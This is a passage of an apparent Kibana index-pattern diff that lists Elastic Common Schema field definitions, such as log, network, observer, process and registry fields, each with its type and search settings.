"aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "log.origin.function", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "log.original", - "readFromDocValues": false, - "scripted": false, - "searchable": false, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "log.syslog.facility.code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "log.syslog.facility.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "log.syslog.priority", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "log.syslog.severity.code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "log.syslog.severity.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "message", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "network.application", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "network.bytes", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "network.community_id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "network.direction", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "ip" - ], - "name": "network.forwarded_ip", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "ip" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "network.iana_number", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "network.inner.vlan.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "network.inner.vlan.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "network.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "network.packets", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "network.protocol", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "network.transport", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "network.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "network.vlan.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "network.vlan.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.egress.interface.alias", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.egress.interface.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.egress.interface.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.egress.vlan.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.egress.vlan.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.egress.zone", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.geo.city_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.geo.continent_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.geo.country_iso_code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.geo.country_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "geo_point" - ], - "name": "observer.geo.location", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "geo_point" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.geo.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.geo.region_iso_code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.geo.region_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.hostname", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.ingress.interface.alias", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.ingress.interface.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.ingress.interface.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.ingress.vlan.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.ingress.vlan.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.ingress.zone", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "ip" - ], - "name": "observer.ip", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "ip" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.mac", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.os.family", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.os.full", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "observer.os.full.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "observer.os.full" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.os.kernel", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.os.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "observer.os.name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "observer.os.name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.os.platform", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.os.version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.product", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.serial_number", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.vendor", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "observer.version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "organization.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "organization.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "organization.name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "organization.name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "os.family", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "os.full", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "os.full.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "os.full" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "os.kernel", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "os.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "os.name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "os.name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "os.platform", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "os.version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "package.architecture", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "package.build_version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "package.checksum", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "package.description", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "package.install_scope", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "package.installed", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "package.license", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "package.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "package.path", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "package.reference", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "package.size", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "package.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "package.version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "pe.company", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "pe.description", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "pe.file_version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "pe.original_file_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "pe.product", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.args", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "process.args_count", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "boolean" - ], - "name": "process.code_signature.exists", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "boolean" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.code_signature.status", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.code_signature.subject_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "boolean" - ], - "name": "process.code_signature.trusted", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "boolean" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "boolean" - ], - "name": "process.code_signature.valid", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "boolean" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.command_line", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "process.command_line.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "process.command_line" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.entity_id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.executable", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "process.executable.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "process.executable" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "process.exit_code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.hash.md5", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.hash.sha1", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.hash.sha256", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.hash.sha512", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "process.name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "process.name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.parent.args", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "process.parent.args_count", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "boolean" - ], - "name": "process.parent.code_signature.exists", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "boolean" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.parent.code_signature.status", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.parent.code_signature.subject_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "boolean" - ], - "name": "process.parent.code_signature.trusted", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "boolean" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "boolean" - ], - "name": "process.parent.code_signature.valid", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "boolean" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.parent.command_line", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "process.parent.command_line.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "process.parent.command_line" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.parent.entity_id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.parent.executable", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "process.parent.executable.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "process.parent.executable" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "process.parent.exit_code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.parent.hash.md5", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.parent.hash.sha1", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.parent.hash.sha256", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.parent.hash.sha512", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.parent.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "process.parent.name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "process.parent.name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "process.parent.pgid", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "process.parent.pid", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "process.parent.ppid", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "process.parent.start", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "process.parent.thread.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.parent.thread.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.parent.title", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "process.parent.title.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "process.parent.title" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "process.parent.uptime", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.parent.working_directory", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "process.parent.working_directory.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "process.parent.working_directory" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.pe.company", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.pe.description", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.pe.file_version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.pe.original_file_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.pe.product", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "process.pgid", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "process.pid", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "process.ppid", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "process.start", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "process.thread.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.thread.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.title", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "process.title.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "process.title" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "process.uptime", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.working_directory", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "process.working_directory.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "process.working_directory" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "registry.data.bytes", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "registry.data.strings", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "registry.data.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "registry.hive", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "registry.key", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "registry.path", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "registry.value", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "related.hash", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "ip" - ], - "name": "related.ip", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "ip" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "related.user", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "rule.author", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "rule.category", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "rule.description", - "readFromDocValues": true, - 